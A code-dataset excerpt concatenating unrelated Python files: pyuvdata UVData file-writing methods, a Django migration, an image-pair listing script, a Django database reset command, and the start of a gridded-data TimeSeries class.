filename,
axis=axis,
file_type=file_type,
allow_rephase=allow_rephase,
phase_center_radec=phase_center_radec,
unphase_to_drift=unphase_to_drift,
phase_frame=phase_frame,
phase_epoch=phase_epoch,
orig_phase_frame=orig_phase_frame,
phase_use_ant_pos=phase_use_ant_pos,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
ant_str=ant_str,
bls=bls,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
polarizations=polarizations,
blt_inds=blt_inds,
time_range=time_range,
keep_all_metadata=keep_all_metadata,
read_data=read_data,
phase_type=phase_type,
correct_lat_lon=correct_lat_lon,
use_model=use_model,
data_column=data_column,
pol_order=pol_order,
data_array_dtype=data_array_dtype,
nsample_array_dtype=nsample_array_dtype,
use_aoflagger_flags=use_aoflagger_flags,
use_cotter_flags=use_cotter_flags,
remove_dig_gains=remove_dig_gains,
remove_coarse_band=remove_coarse_band,
correct_cable_len=correct_cable_len,
correct_van_vleck=correct_van_vleck,
cheby_approx=cheby_approx,
flag_small_auto_ants=flag_small_auto_ants,
flag_small_sig_ants=flag_small_sig_ants,
propagate_coarse_flags=propagate_coarse_flags,
flag_init=flag_init,
edge_width=edge_width,
start_flag=start_flag,
end_flag=end_flag,
flag_dc_offset=flag_dc_offset,
remove_flagged_ants=remove_flagged_ants,
phase_to_pointing_center=phase_to_pointing_center,
skip_bad_files=skip_bad_files,
multidim_index=multidim_index,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
isource=isource,
irec=irec,
isb=isb,
corrchunk=corrchunk,
pseudo_cont=pseudo_cont,
lsts=lsts,
lst_range=lst_range,
calc_lst=calc_lst,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
make_multi_phase=make_multi_phase,
ignore_name=ignore_name,
)
return uvd
def write_miriad(
self,
filepath,
clobber=False,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
no_antnums=False,
calc_lst=False,
):
"""
Write the data to a miriad file.
Parameters
----------
filepath : str
The miriad root directory to write to.
clobber : bool
Option to overwrite the filename if the file already exists.
run_check : bool
Option to check for the existence and proper shapes of parameters
before writing the file (the default is True,
meaning the check will be run).
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
run_check_acceptability : bool
Option to check acceptable range of the values of parameters before
writing the file (the default is True, meaning the acceptable
range check will be done).
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
no_antnums : bool
Option to not write the antnums variable to the file.
Should only be used for testing purposes.
calc_lst : bool
Recalculate the LST values upon writing the file. This is done to perform
higher-precision accounting for the difference in MIRIAD timestamps vs
pyuvdata (the former marks the beginning of an integration, the latter
marks the midpoint). Default is False, which instead uses a simple formula
for correcting the LSTs, expected to be accurate to approximately 0.1 µsec
precision.
Raises
------
ValueError
If the frequencies are not evenly spaced or are separated by more
than their channel width or if the UVData object is a metadata only object.
TypeError
If any entry in extra_keywords is not a single string or number.
"""
if self.metadata_only:
raise ValueError("Cannot write out metadata only objects to a miriad file.")
miriad_obj = self._convert_to_filetype("miriad")
miriad_obj.write_miriad(
filepath,
clobber=clobber,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
no_antnums=no_antnums,
calc_lst=calc_lst,
)
del miriad_obj
def write_mir(
self, filepath,
):
"""
Write the data to a mir file.
Parameters
----------
filepath : str
The mir root directory to write to.
Raises
------
ValueError
If the UVData object is a metadata only object.
NotImplementedError
Method is not fully implemented yet, and thus will raise an error.
"""
if self.metadata_only:
raise ValueError("Cannot write out metadata only objects to a mir file.")
mir_obj = self._convert_to_filetype("mir")
mir_obj.write_mir(filepath,)
del mir_obj
def write_ms(
self,
filename,
force_phase=False,
clobber=False,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Write a CASA measurement set (MS).
Parameters
----------
filename : str
The measurement set file path to write to (a measurement set is really
a folder with many files).
force_phase : bool
Option to automatically phase drift scan data to zenith of the first
timestamp.
clobber : bool
Option to overwrite the file if it already exists.
run_check : bool
Option to check for the existence and proper shapes of parameters
before writing the file.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters before
writing the file.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Raises
------
ValueError
If the UVData object is a metadata only object.
"""
if self.metadata_only:
raise ValueError(
"Cannot write out metadata only objects to a measurement set file."
)
ms_obj = self._convert_to_filetype("ms")
ms_obj.write_ms(
filename,
force_phase=force_phase,
clobber=clobber,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
del ms_obj
def write_uvfits(
self,
filename,
spoof_nonessential=False,
write_lst=True,
force_phase=False,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Write the data to a uvfits file.
Parameters
----------
filename : str
The uvfits file to write to.
spoof_nonessential : bool
Option to spoof the values of optional UVParameters that are not set
but are required for uvfits files.
write_lst : bool
Option to write the LSTs to the metadata (random group parameters).
force_phase : bool
Option to automatically phase drift scan data to zenith of the first
timestamp.
run_check : bool
Option to check for the existence and proper shapes of parameters
before writing the file (the default is True,
meaning the check will be run).
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
run_check_acceptability : bool
Option to check acceptable range of the values of parameters before
writing the file (the default is True, meaning the acceptable
range check will be done).
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Raises
------
ValueError
The `phase_type` of the object is "drift" and the `force_phase`
keyword is not set.
If the frequencies are not evenly spaced or are separated by more
than their channel width.
The polarization values are not evenly spaced.
Any of ['antenna_positions', 'gst0', 'rdate', 'earth_omega', 'dut1',
'timesys'] are not set on the object and `spoof_nonessential` is False.
If the `timesys` parameter is not set to "UTC".
If the UVData object is a metadata only object.
TypeError
If any entry in extra_keywords is not a single string or number.
"""
if self.metadata_only:
raise ValueError("Cannot write out metadata only objects to a uvfits file.")
uvfits_obj = self._convert_to_filetype("uvfits")
uvfits_obj.write_uvfits(
filename,
spoof_nonessential=spoof_nonessential,
write_lst=write_lst,
force_phase=force_phase,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
del uvfits_obj
def write_uvh5(
self,
filename,
clobber=False,
chunks=True,
data_compression=None,
flags_compression="lzf",
nsample_compression="lzf",
data_write_dtype=None,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Write a completely in-memory UVData object to a UVH5 file.
Parameters
----------
filename : str
The UVH5 file to write to.
clobber : bool
Option to overwrite the file if it already exists.
chunks : tuple or bool
h5py.create_dataset chunks keyword. Tuple for chunk shape,
True for auto-chunking, None for no chunking. Default is True.
data_compression : str
HDF5 filter to apply when writing the data_array. Default is
None meaning no filter or compression. Dataset must be chunked.
flags_compression : str
HDF5 filter to apply when writing the flags_array. Default is "lzf"
for the LZF filter. Dataset must be chunked.
nsample_compression : str
HDF5 filter to apply when writing the nsample_array. Default is "lzf"
for the LZF filter. Dataset must be chunked.
data_write_dtype : numpy dtype
datatype of output visibility data. If 'None', then the same datatype
as data_array will be used. Otherwise, a numpy dtype object must be
specified with an 'r' field and an 'i' field for real and imaginary
parts, respectively. See uvh5.py for an example of defining such a datatype.
run_check : bool
Option to check for the existence and proper shapes of parameters
            before writing the file (the default is True,
meaning the check will be run).
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
run_check_acceptability : bool
Option to check acceptable range of the values of parameters before
writing the file (the default is True, meaning the acceptable
range check will be done).
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Raises
------
ValueError
If the UVData object is a metadata only object.
"""
if self.metadata_only:
raise ValueError(
"Cannot write out metadata only objects to a uvh5 file. To initialize "
"a uvh5 file for partial writing, use the `initialize_uvh5_file` "
"method."
)
uvh5_obj = self._convert_to_filetype("uvh5")
uvh5_obj.write_uvh5(
filename,
clobber=clobber,
chunks=chunks,
data_compression=data_compression,
flags_compression=flags_compression,
nsample_compression=nsample_compression,
data_write_dtype=data_write_dtype,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
del uvh5_obj
def initialize_uvh5_file(
self,
filename,
clobber=False,
chunks=True,
data_compression=None,
flags_compression="lzf",
nsample_compression="lzf",
data_write_dtype=None,
):
"""
Initialize a UVH5 file on disk with the header metadata and empty data arrays.
Parameters
----------
filename : str
The UVH5 file to write to.
clobber : bool
Option to overwrite the file if it already exists.
chunks : tuple or bool
h5py.create_dataset chunks keyword. Tuple for chunk shape,
True for auto-chunking, None for no chunking. Default is True.
data_compression : str
HDF5 filter to apply when writing the data_array. Default is
None meaning no filter or compression. Dataset must be chunked.
flags_compression : str
HDF5 filter to apply when writing the flags_array. Default is "lzf"
for the LZF filter. Dataset must be chunked.
nsample_compression : str
HDF5 filter to apply when writing the nsample_array. Default is "lzf"
for the LZF filter. Dataset must be chunked.
data_write_dtype : numpy dtype
datatype of output visibility data. If 'None', then the same datatype
as data_array will be used. Otherwise, a numpy dtype object must be
specified with an 'r' field and an 'i' field for real and imaginary
parts, respectively. See uvh5.py for an example of defining such a datatype.
Notes
-----
When partially writing out data, this function should be called first
to initialize the file on disk. The data is then actually written by
calling the write_uvh5_part method, with the same filename as the one
specified in this function. See the tutorial for a worked example.
"""
uvh5_obj = self._convert_to_filetype("uvh5")
uvh5_obj.initialize_uvh5_file(
filename,
clobber=clobber,
chunks=chunks,
data_compression=data_compression,
flags_compression=flags_compression,
nsample_compression=nsample_compression,
data_write_dtype=data_write_dtype,
)
del uvh5_obj
def write_uvh5_part(
self,
filename,
data_array,
flags_array,
nsample_array,
check_header=True,
antenna_nums=None,
antenna_names=None,
ant_str=None,
bls=None,
frequencies=None,
freq_chans=None,
times=None,
polarizations=None,
blt_inds=None,
add_to_history=None,
run_check_acceptability=True,
):
"""
Write data to a UVH5 file that has already been initialized.
Parameters
----------
filename : str
The UVH5 file to write to. It must already exist, and is assumed to
have been initialized with initialize_uvh5_file.
data_array : ndarray
The data to write to disk. A check is done to ensure that the
dimensions of the data passed in conform to the ones specified by
the "selection" arguments.
flags_array : ndarray
The flags array to write to disk. A check is done to ensure that the
dimensions of the data passed in conform to the ones specified by
the "selection" arguments.
nsample_array : ndarray
The nsample array to write to disk. A check is done to ensure that the
dimensions of the data passed in conform to the ones specified by
the "selection" arguments.
check_header : bool
Option to check that the metadata present in the header on disk
matches that in the object.
antenna_nums : array_like of int, optional
            The antenna numbers to include when writing data into the file
(antenna positions and names for the removed antennas will be retained).
This cannot be provided if `antenna_names` is also provided.
antenna_names : array_like of str, optional
            The antenna names to include when writing data into the file
(antenna positions and names for the removed antennas will be retained).
This cannot be provided if `antenna_nums` is also provided.
bls : list of tuple, optional
A list of antenna number tuples (e.g. [(0, 1), (3, 2)]) or a list of
baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]) specifying baselines
to include when writing data into the file. For length-2 tuples,
the ordering of the numbers within the tuple does not matter. For
length-3 tuples, the polarization string is in the order of the two
antennas. If length-3 tuples are provided, `polarizations` must be
None.
ant_str : str, optional
A string containing information about what antenna numbers
            and polarizations to include when writing data into the file.
Can be 'auto', 'cross', 'all', or combinations of antenna numbers
and polarizations (e.g. '1', '1_2', '1x_2y'). See tutorial for more
examples of valid strings and the behavior of different forms for ant_str.
If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
            An ant_str cannot be passed in addition to any of the `antenna_nums`,
            `antenna_names`, `bls` or `polarizations` parameters; if it is, a
            ValueError will be raised.
frequencies : array_like of float, optional
The frequencies to include when writing data into the file, each
value passed here should exist in the freq_array.
freq_chans : array_like of int, optional
            The frequency channel numbers to include when writing data into the file.
times : array_like of float, optional
The times to include when writing data into the file, each value
passed here should exist in the time_array.
polarizations : array_like of int, optional
            The polarization numbers to include when writing data into the file,
each value passed here should exist in the polarization_array.
blt_inds : array_like of int, optional
The baseline-time indices to include when writing data into the file.
This is not commonly used.
add_to_history : str
String to append to history before write out. Default is no appending.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters before
writing the file (the default is True, meaning the acceptable
range check will be done).
"""
uvh5_obj = self._convert_to_filetype("uvh5")
uvh5_obj.write_uvh5_part(
filename,
data_array,
flags_array,
nsample_array,
check_header=check_header,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
bls=bls,
ant_str=ant_str,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
polarizations=polarizations,
blt_inds=blt_inds,
add_to_history=add_to_history,
run_check_acceptability=run_check_acceptability,
)
del uvh5_obj
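    # ------------------------------------------------------------------------------
    # Illustrative sketch (not part of the original class): the partial-write
    # workflow described in the initialize_uvh5_file notes above. `uvd` is assumed
    # to be an already populated UVData object, and `data_chunk`, `flag_chunk` and
    # `nsample_chunk` are assumed to be numpy arrays shaped to match the selected
    # frequency channels; the output file name is hypothetical.
    #
    #   outfile = "partial_write_example.uvh5"
    #   # step 1: write the header metadata and empty, chunked data arrays
    #   uvd.initialize_uvh5_file(outfile, clobber=True)
    #   # step 2: write the data in pieces, here one block of frequency channels
    #   uvd.write_uvh5_part(
    #       outfile,
    #       data_chunk,
    #       flag_chunk,
    #       nsample_chunk,
    #       freq_chans=range(0, 64),
    #   )
    # ------------------------------------------------------------------------------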
| StarcoderdataPython |
1781534 | <gh_stars>0
# Generated by Django 3.2.6 on 2021-11-26 19:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('storehouse', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='user',
name='age',
field=models.CharField(blank=True, max_length=50),
),
migrations.AddField(
model_name='user',
name='bio',
field=models.TextField(blank=True, max_length=200),
),
migrations.AddField(
model_name='user',
name='phone',
field=models.CharField(blank=True, max_length=50),
),
]
| StarcoderdataPython |
99136 | <gh_stars>0
# coding: utf-8
import os
import sys
import glob
from pathlib import Path
image_ext = ['.JPG', '.jpg', '.jpeg','.JPEG','.png','.bmp']
def create_match_file_list(image_path, match_folder_file, match_list_file):
with open(match_list_file, "w") as fout:
# fid.write(HEADER)
# for _, cam in cameras.items():
# to_write = [cam.id, cam.model, cam.width, cam.height, *cam.params]
# line = " ".join([str(elem) for elem in to_write])
# fid.write(line + "\n")
with open(match_folder_file, "r") as fid:
while True:
line = fid.readline()
if not line:
break
line = line.strip()
if len(line) > 0 and line[0] != "#":
elems = line.split()
folder1 = elems[0]
folder2 = elems[1]
images1 = searchDirFile(image_path + '/' + folder1, image_ext)
images2 = searchDirFile(image_path + '/' + folder2, image_ext)
for image1 in images1:
name1 = image1.replace(image_path + '/', '')
for image2 in images2:
name2 = image2.replace(image_path + '/', '')
fout.write(name1 + ' ' + name2 + "\n")
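# Illustrative note (an assumption based on the parsing above, not part of the original
# script): each non-comment line of match_folder_file is expected to name two image
# folders, relative to image_path and separated by whitespace, e.g.
#
#   # folder pairs to match
#   block_a block_b
#   block_a block_c
#
# Every image found under the first folder is then paired with every image under the
# second one, and each pair is written to match_list_file as
# "block_a/img_001.jpg block_b/img_042.jpg".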
def create_match_pair(image_path, folder1, folder2, image_ext):
image_pairs = []
images1 = searchDirFile(folder1, image_ext)
images2 = searchDirFile(folder2, image_ext)
for image1 in images1:
name1 = image1.replace(image_path + '/', '')
for image2 in images2:
name2 = image2.replace(image_path + '/', '')
image_pairs.append([name1, name2])
return image_pairs
def searchDirFile(rootDir, suffix):
res = []
for dir_or_file in os.listdir(rootDir):
filePath = os.path.join(rootDir, dir_or_file)
        # check whether the entry is a file
if os.path.isfile(filePath):
            # if it is a file, keep it only when its name ends with one of the given extensions; otherwise skip it
for ext in suffix:
if os.path.basename(filePath).endswith(ext):
res.append(os.path.join(rootDir, os.path.basename(filePath)))
else:
continue
        # if it is a directory, call this function recursively on it
elif os.path.isdir(filePath):
subres = searchDirFile(filePath, suffix)
res = res + subres
        else:
            print('not a file or directory: ' + os.path.basename(filePath))
return res
def getFiles(dir, suffix):
res = []
for root, directory, files in os.walk(dir):
for filename in files:
name, suf = os.path.splitext(filename)
for ext in suffix:
if suf == ext:
res.append(os.path.join(root, filename))
return res
def main():
res = searchDirFile("/media/netease/Storage/LargeScene/Scene/XixiWetland/colmap_model/xray_test_material/images", ["jpg", "png"])
print(res)
# create_match_file_list(
# sys.argv[1],
# sys.argv[2],
# sys.argv[3],
# )
if __name__ == "__main__":
main()
| StarcoderdataPython |
3337397 | <gh_stars>1-10
"""
reset_db
========
Django command to drop and recreate a database.
Useful when running tests against a database which may previously have
had different migrations applied to it.
This handles the one specific use case of the "reset_db" command from
django-extensions that we were actually using.
originally from http://www.djangosnippets.org/snippets/828/ by dnordberg
"""
import logging
import configparser
import django
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
class Command(BaseCommand): # lint-amnesty, pylint: disable=missing-class-docstring
help = "Resets the database for this project."
def add_arguments(self, parser):
parser.add_argument(
'-R', '--router', action='store', dest='router', default='default',
help='Use this router-database other than defined in settings.py')
def handle(self, *args, **options): # lint-amnesty, pylint: disable=too-many-statements
"""
Resets the database for this project.
        Note: transaction wrappers are applied in reverse order as a workaround
        for autocommit behavior.
"""
router = options.get('router')
dbinfo = settings.DATABASES.get(router)
if dbinfo is None:
raise CommandError("Unknown database router %s" % router)
engine = dbinfo.get('ENGINE').split('.')[-1]
user = password = database_name = database_host = database_port = ''
if engine == 'mysql':
(user, password, database_name, database_host, database_port) = parse_mysql_cnf(dbinfo)
user = dbinfo.get('USER') or user
password = dbinfo.get('PASSWORD') or password
owner = user
database_name = dbinfo.get('NAME') or database_name
if database_name == '':
raise CommandError("You need to specify DATABASE_NAME in your Django settings file.")
database_host = dbinfo.get('HOST') or database_host
database_port = dbinfo.get('PORT') or database_port
verbosity = int(options.get('verbosity', 1))
if engine in ('sqlite3', 'spatialite'):
import os
try:
logging.info("Unlinking %s database", engine)
os.unlink(database_name)
except OSError:
pass
elif engine in ('mysql',):
import MySQLdb as Database
kwargs = {
'user': user,
'passwd': password,
}
if database_host.startswith('/'):
kwargs['unix_socket'] = database_host
else:
kwargs['host'] = database_host
if database_port:
kwargs['port'] = int(database_port)
connection = Database.connect(**kwargs)
drop_query = 'DROP DATABASE IF EXISTS `%s`' % database_name
utf8_support = 'CHARACTER SET utf8'
create_query = f'CREATE DATABASE `{database_name}` {utf8_support}'
logging.info('Executing... "' + drop_query + '"') # lint-amnesty, pylint: disable=logging-not-lazy
connection.query(drop_query)
logging.info('Executing... "' + create_query + '"') # lint-amnesty, pylint: disable=logging-not-lazy
connection.query(create_query)
elif engine in ('postgresql', 'postgresql_psycopg2', 'postgis'):
if engine == 'postgresql' and django.VERSION < (1, 9):
import psycopg as Database # NOQA # lint-amnesty, pylint: disable=import-error
elif engine in ('postgresql', 'postgresql_psycopg2', 'postgis'):
import psycopg2 as Database # NOQA # lint-amnesty, pylint: disable=import-error
conn_params = {'database': 'template1'}
if user:
conn_params['user'] = user
if password:
conn_params['password'] = password
if database_host:
conn_params['host'] = database_host
if database_port:
conn_params['port'] = database_port
connection = Database.connect(**conn_params)
            connection.set_isolation_level(0)  # autocommit mode (psycopg2 ISOLATION_LEVEL_AUTOCOMMIT)
cursor = connection.cursor()
drop_query = "DROP DATABASE \"%s\";" % database_name
logging.info('Executing... "' + drop_query + '"') # lint-amnesty, pylint: disable=logging-not-lazy
try:
cursor.execute(drop_query)
except Database.ProgrammingError as e:
logging.exception("Error: %s", e)
create_query = "CREATE DATABASE \"%s\"" % database_name
if owner:
create_query += " WITH OWNER = \"%s\" " % owner
create_query += " ENCODING = 'UTF8'"
if engine == 'postgis' and django.VERSION < (1, 9):
# For PostGIS 1.5, fetch template name if it exists
from django.contrib.gis.db.backends.postgis.base import DatabaseWrapper
postgis_template = DatabaseWrapper(dbinfo).template_postgis # lint-amnesty, pylint: disable=no-member
if postgis_template is not None:
create_query += ' TEMPLATE = %s' % postgis_template
if settings.DEFAULT_TABLESPACE:
create_query += ' TABLESPACE = %s;' % settings.DEFAULT_TABLESPACE
else:
create_query += ';'
logging.info('Executing... "' + create_query + '"') # lint-amnesty, pylint: disable=logging-not-lazy
cursor.execute(create_query)
else:
raise CommandError("Unknown database engine %s" % engine)
if verbosity >= 2:
print("Reset successful.")
def parse_mysql_cnf(dbinfo):
"""
Attempt to parse mysql database config file for connection settings.
Ideally we would hook into django's code to do this, but read_default_file is handled by the mysql C libs
so we have to emulate the behaviour
Settings that are missing will return ''
returns (user, password, database_name, database_host, database_port)
"""
read_default_file = dbinfo.get('OPTIONS', {}).get('read_default_file')
if read_default_file:
config = configparser.RawConfigParser({
'user': '',
'password': '',
'database': '',
'host': '',
'port': '',
'socket': '',
})
import os
config.read(os.path.expanduser(read_default_file))
try:
user = config.get('client', 'user')
password = config.get('client', 'password')
database_name = config.get('client', 'database')
database_host = config.get('client', 'host')
database_port = config.get('client', 'port')
socket = config.get('client', 'socket')
if database_host == 'localhost' and socket:
# mysql actually uses a socket if host is localhost
database_host = socket
return user, password, database_name, database_host, database_port
except configparser.NoSectionError:
pass
return '', '', '', '', ''
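# Illustrative sketch (an assumption, not part of the original command): a minimal MySQL
# options file that parse_mysql_cnf can read when the Django DATABASES entry sets
# OPTIONS = {'read_default_file': '~/.my.cnf'}:
#
#   [client]
#   user = django
#   password = secret
#   database = myproject
#   host = 127.0.0.1
#   port = 3306
#
# The command itself is then invoked as, e.g.:  python manage.py reset_db --router default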
| StarcoderdataPython |
1601901 | <filename>src/Hero.py
#!/usr/bin/python
class Hero(object):
def __init__(self, Name):
self.name = Name
| StarcoderdataPython |
1773105 | """
Author: <NAME>
Copyright: <NAME>, RCH Engineering, 2021
License: BSD Clear 3 Clause License
All rights reserved
"""
import datetime
import os
import warnings
import affine
import geopandas as gpd
import h5py
import netCDF4 as nc
import numpy as np
import pandas as pd
import rasterio.features as riof
import requests
import xarray as xr
from pydap.cas.urs import setup_session
try:
import pygrib
except ImportError:
pygrib = None
from ._coords import _map_coords_to_slice
from ._utils import _assign_eng
from ._utils import _guess_time_var
from ._utils import _array_by_eng
from ._utils import _array_to_stat_list
from ._utils import _attr_by_eng
from ._utils import _delta_to_time
from ._utils import _gen_stat_list
from ._consts import ALL_ENGINES
from ._consts import SPATIAL_X_VARS
from ._consts import SPATIAL_Y_VARS
__all__ = ['TimeSeries', ]
class TimeSeries:
"""
Creates a time series of values from arrays contained in netCDF, grib, hdf, or geotiff formats. Values in the
series are extracted by specifying coordinates of a point, range of coordinates, a spatial data file, or computing
statistics for the entire array.
Args:
files (list): A list (even if len==1) of either absolute file paths to netcdf, grib, hdf5, or geotiff files or
urls to an OPeNDAP service (but beware the data transfer speed bottleneck)
var (str or int or list or tuple): The name of the variable(s) to query as they are stored in the file
(e.g. often 'temp' or 'T' instead of Temperature) or the band number if you are using grib files *and* you
specify the engine as pygrib. If the var is contained in a group, include the group name as a unix style
path e.g. 'group_name/var'.
dim_order (tuple): A tuple of the names of the dimensions/coordinate variables for all of the variables listed
in the "var" parameter, listed in order. If the coordinate variables are contained in a group, include the
group name as a unix style path e.g. 'group_name/coord_var'.
Keyword Args:
t_var (str): Name of the time dimension/coordinate variable if it is used in the data. Grids will attempt to
guess if it is not "time" and you do not specify one with this argument.
x_var (str): Name of the x dimension/coordinate variable if it is used in the data. Grids will attempt to
guess if it is not specified and not a standard name.
y_var (str): Name of the y dimension/coordinate variable if it is used in the data. Grids will attempt to
guess if it is not specified and not a standard name.
engine (str): the python package used to power the file reading. Defaults to best for the type of input data.
The options include 'xarray', 'opendap', 'auth-opendap', 'netcdf4', 'cfgrib', 'pygrib', 'h5py', 'rasterio'
xr_kwargs (dict): A dictionary of kwargs that you might need when opening complex grib files with xarray
user (str): a username used for authenticating remote datasets, if required by your remote data source
pswd (str): a password used for authenticating remote datasets, if required by your remote data source
session (requests.Session): a requests Session object preloaded with credentials/tokens for authentication
stats (str or tuple): How to reduce arrays of values to a single value in the series dataframe.
Provide a list of strings (e.g. ['mean', 'max']), or a comma separated string (e.g. 'mean,max,min').
Options include: mean, median, max, min, sum, std, or a percentile (e.g. '25%').
Or, provide 'all' which is interpreted as (mean, median, max, min, sum, std, ).
Or, provide 'box' or 'boxplot' which is interpreted as (max, 75%, median, mean, 25%, min, ).
Or, provide 'values' to get a flat list of all non-null values in the query so you can compute other stats.
fill_value (int): The value used for filling no_data/null values in the variable's array. Default: -9999.0
interp_units (bool): If your data conforms to the CF NetCDF standard for time data, choose True to
convert the values in the time variable to datetime strings in the pandas output. The units string for the
time variable of each file is checked separately unless you specify it in the unit_str parameter.
origin_format (str): A datetime.strptime string for extracting the origin time from the units string.
        unit_str (str): a CF Standard conforming string indicating the spacing and origin of the time values.
This is helpful if your files do not contain a units string. Only specify this if ALL files that you query
use the same units string. Usually this looks like "step_size since YYYY-MM-DD HH:MM:SS" such as
"days since 2000-01-01 00:00:00".
strp_filename (str): A datetime.strptime string for extracting datetimes from patterns in file names. Only for
datasets which contain 1 time step per file.
Methods:
point: Extracts a time series of values at a point for a given coordinate pair
multipoint: Extracts a time series of values for several points given a series of coordinate values
bound: Extracts a time series of values with a bounding box for each requested statistic
range: Alias for TimeSeries.bound()
shape: Extracts a time series of values on a line or within a polygon for each requested statistic
"""
# core parameters from user
files: list
var: tuple
dim_order: tuple
# handling non-standard dimension names or organizations
t_var: str
x_var: str
y_var: str
# help opening data
engine: str
xr_kwargs: dict
user: str
pswd: str
session: requests.session
# reducing arrays to numbers
stats: str or list or tuple or np.ndarray
fill_value: int or float or bool
# how to handle the time data
interp_units: bool
origin_format: str
unit_str: str
strp_filename: str
t_index: int # derived from dim_order and t_var
t_var_in_dims: bool # derived from dim_order and t_var
def __init__(self, files: list, var: str or int or list or tuple, dim_order: tuple, **kwargs):
# parameters configuring how the data is interpreted
self.files = (files,) if isinstance(files, str) else files
self.variables = (var,) if isinstance(var, str) else var
assert len(self.variables) >= 1, 'specify at least 1 variable'
self.dim_order = dim_order
# optional parameters describing how to access the data
self.engine = kwargs.get('engine', _assign_eng(files[0]))
assert self.engine in ALL_ENGINES, f'engine "{self.engine}" not recognized'
self.xr_kwargs = kwargs.get('xr_kwargs', None)
# optional parameters modifying how dimension/coordinate variable names are interpreted
self.t_var = kwargs.get('t_var', None)
self.x_var = kwargs.get('x_var', None)
self.y_var = kwargs.get('y_var', None)
if self.x_var is None:
for a in self.dim_order:
if a in SPATIAL_X_VARS:
self.x_var = a
if self.y_var is None:
for a in self.dim_order:
if a in SPATIAL_Y_VARS:
self.y_var = a
if self.t_var is None:
self.t_var = _guess_time_var(dim_order)
self.t_var_in_dims = self.t_var in self.dim_order
self.t_index = self.dim_order.index(self.t_var) if self.t_var_in_dims else False
# additional options describing how the time data should be interpreted
self.interp_units = kwargs.get('interp_units', False)
self.strp_filename = kwargs.get('strp_filename', False)
self.unit_str = kwargs.get('unit_str', None)
self.origin_format = kwargs.get('origin_format', '%Y-%m-%d %X')
# optional parameter modifying which statistics to process
self.stats = _gen_stat_list(kwargs.get('stats', ('mean',)))
self.fill_value = kwargs.get('fill_value', -9999.0)
# optional authentication for remote datasets
self.user = kwargs.get('user', None)
self.pswd = kwargs.get('pswd', None)
self.session = kwargs.get('session', False)
if 'opendap' in self.engine and not self.session and self.user is not None and self.pswd is not None:
a = requests.Session()
a.auth = (self.user, self.pswd)
self.session = a
# validate that some parameters are compatible
if self.engine == 'rasterio':
assert isinstance(self.variables, int), 'GeoTIFF variables must be integer band numbers'
if not self.dim_order == ('y', 'x'):
warnings.warn('For GeoTIFFs, the correct dim order is ("y", "x")')
self.dim_order = ('y', 'x')
elif self.engine == 'pygrib':
if pygrib is None:
raise ModuleNotFoundError('pygrib engine only available if optional pygrib dependency is installed')
assert isinstance(self.variables, int), 'pygrib engine variables must be integer band numbers'
def __bool__(self):
return True
def __str__(self):
string = 'grids.TimeSeries'
for p in vars(self):
if p == 'files':
string += f'\n\t{p}: {len(self.__getattribute__(p))}'
else:
string += f'\n\t{p}: {self.__getattribute__(p)}'
return string
def __repr__(self):
return self.__str__()
def point(self,
*coords: int or float or None, ) -> pd.DataFrame:
"""
Extracts a time series at a point for a given series of coordinate values
Args:
coords (int or float or None): provide a coordinate value (integer or float) for each dimension of the
array which you are creating a time series for. You need to provide exactly the same number of
coordinates as there are dimensions
Returns:
pandas.DataFrame with an index, a column named datetime, and a column named values.
"""
assert len(self.dim_order) == len(coords), 'Specify 1 coordinate for each dimension of the array'
# make the return item
results = dict(datetime=[])
for var in self.variables:
results[var] = []
# map coordinates -> cell indices -> python slice() objects
slices = self._gen_dim_slices(coords, 'point')
# iterate over each file extracting the value and time for each
for num, file in enumerate(self.files):
# open the file
opened_file = self._open_data(file)
tsteps, tslices = self._handle_time(opened_file, file, (coords, coords))
results['datetime'] += list(tsteps)
slices[self.t_index] = tslices if self.t_var_in_dims else slices[self.t_index]
for var in self.variables:
# extract the appropriate values from the variable
vs = _array_by_eng(opened_file, var, tuple(slices))
if vs.ndim == 0:
if vs == self.fill_value:
vs = np.nan
results[var].append(vs)
elif vs.ndim == 1:
vs[vs == self.fill_value] = np.nan
for v in vs:
results[var].append(v)
else:
raise ValueError('Too many dimensions remain after slicing')
if self.engine != 'pygrib':
opened_file.close()
# return the data stored in a dataframe
